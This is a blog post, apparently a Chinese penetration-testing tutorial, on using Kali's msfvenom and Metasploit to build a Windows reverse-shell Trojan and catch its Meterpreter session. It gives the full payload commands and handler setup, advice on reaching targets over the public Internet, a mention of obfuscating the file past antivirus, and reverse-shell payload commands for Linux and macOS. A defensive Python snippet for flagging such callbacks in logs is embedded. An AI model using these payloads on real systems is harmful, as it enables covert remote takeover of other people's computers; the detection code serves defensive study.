Generating a remote-control payload with Kali

The Metasploit Framework on Kali Linux is one of the best penetration testing frameworks. This post records the process of using Kali to generate a Windows remote-control Trojan.

The payload is generated with the msfvenom tool. Entering msfvenom on its own displays its basic parameters.

We did not pass any parameters here, so the first line of the output is an error.

Here we mainly cover generating and using Windows payloads. The fifth line of the output already gives an example of generating a payload, one that produces a Trojan for Windows, which is:

 Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

The example given does not specify a port number, so we modify it as follows:

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > ./Cl0ud.exe

LHOST is the IP address of your Kali machine, and LPORT is the port on which Kali listens for the shell. The generated exe file is written to Cl0ud.exe in the current directory.

Here my Kali machine's network address is 10.10.10.128 and the listener port is 1234.

Let's open the Metasploit Framework by entering msfconsole:

Then use msfvenom to generate the Cl0ud.exe Trojan:

Now we can see that the Cl0ud.exe Trojan has been generated in the folder.

I put it on the desktop of my Windows 10 host.

 

 

Then we need a module that sets up a handler for the reverse session opened by the backdoor, called exploit/multi/handler.

Enable it with use exploit/multi/handler:

We set the listening port and host IP; note that they must be the same as the values set inside the payload:

Then we set the payload, i.e.,

set payload windows/meterpreter/reverse_tcp

 

The setup on Kali is now complete. We enter exploit to start listening.

Now Kali waits for someone on the Windows host to click Cl0ud.exe, at which point you get a shell.

At this point the shell has been obtained. We enter sysinfo to view the system information, which shows that it succeeded.

After access is obtained, what you do next is up to you.

The environment here is a local network environment. If you want the payload generated on Kali to work over the public Internet, switch Kali's network to bridged mode and use a different network card from the host; the resulting Trojan will then work over the public network as well.

In addition, if antivirus software is installed on the Windows host, it may detect the file as a Trojan and raise an alert. Cl0ud.exe can also be further obfuscated and encrypted at generation time in order to bypass antivirus recognition and get a shell directly (I'll write about obfuscation and encryption for bypass next time, mostly out of laziness).
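From the defender's side, the callback this walkthrough produces (an executable on the user's desktop connecting out to 10.10.10.128 on port 1234) can be flagged from network-connection logs. The following is an added example, not code from the original post: it scores constructed records that use Sysmon Event ID 3 field names, and the directory list, port baseline and threshold are assumptions to tune per environment.

```python
import re

# Paths a standard user can write to; executables launched from here that
# open outbound connections deserve a second look (assumed list).
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(desktop|downloads|appdata\\local\\temp)\\", re.I)
# Assumed baseline of expected outbound ports; tune per environment.
COMMON_PORTS = {53, 80, 123, 443}

# Constructed sample records using Sysmon Event ID 3 field names.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\alice\Desktop\Cl0ud.exe", "Initiated": "true",
     "DestinationIp": "10.10.10.128", "DestinationPort": "1234"},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "Initiated": "true",
     "DestinationIp": "198.51.100.20", "DestinationPort": "443"},
    {"Image": r"C:\Users\alice\Downloads\setup.exe", "Initiated": "true",
     "DestinationIp": "203.0.113.7", "DestinationPort": "443"},
    {"Image": r"C:\Users\alice\Desktop\tool.exe", "Initiated": "false",
     "DestinationIp": "10.10.10.50", "DestinationPort": "1234"},
]

def reasons_for(event):
    """Return the reasons an outbound connection looks like a reverse-shell callback."""
    if event.get("Initiated", "").lower() != "true":
        return []  # connection was inbound, not a callback from this host
    reasons = []
    if USER_WRITABLE.search(event.get("Image", "")):
        reasons.append("image runs from a user-writable directory")
    try:
        port = int(event.get("DestinationPort", ""))
    except ValueError:
        return reasons + ["unparseable destination port"]
    if port not in COMMON_PORTS:
        reasons.append(f"uncommon destination port {port}")
    return reasons

def flag_events(events, min_reasons=2):
    """Return (image, destination, reasons) for events with enough indicators."""
    flagged = []
    for ev in events:
        why = reasons_for(ev)
        if len(why) >= min_reasons:
            dest = f'{ev.get("DestinationIp")}:{ev.get("DestinationPort")}'
            flagged.append((ev.get("Image"), dest, why))
    return flagged

if __name__ == "__main__":
    for image, dest, why in flag_events(SAMPLE_EVENTS):
        print(f"ALERT {image} -> {dest}: {'; '.join(why)}")
```

Requiring two indicators keeps a browser download that talks to port 443 from alerting on its own, while the desktop executable calling out to port 1234 is flagged.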

 

Here are the payload generation commands for some other environments:

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho


Origin www.cnblogs.com/Cl0ud/p/11756544.html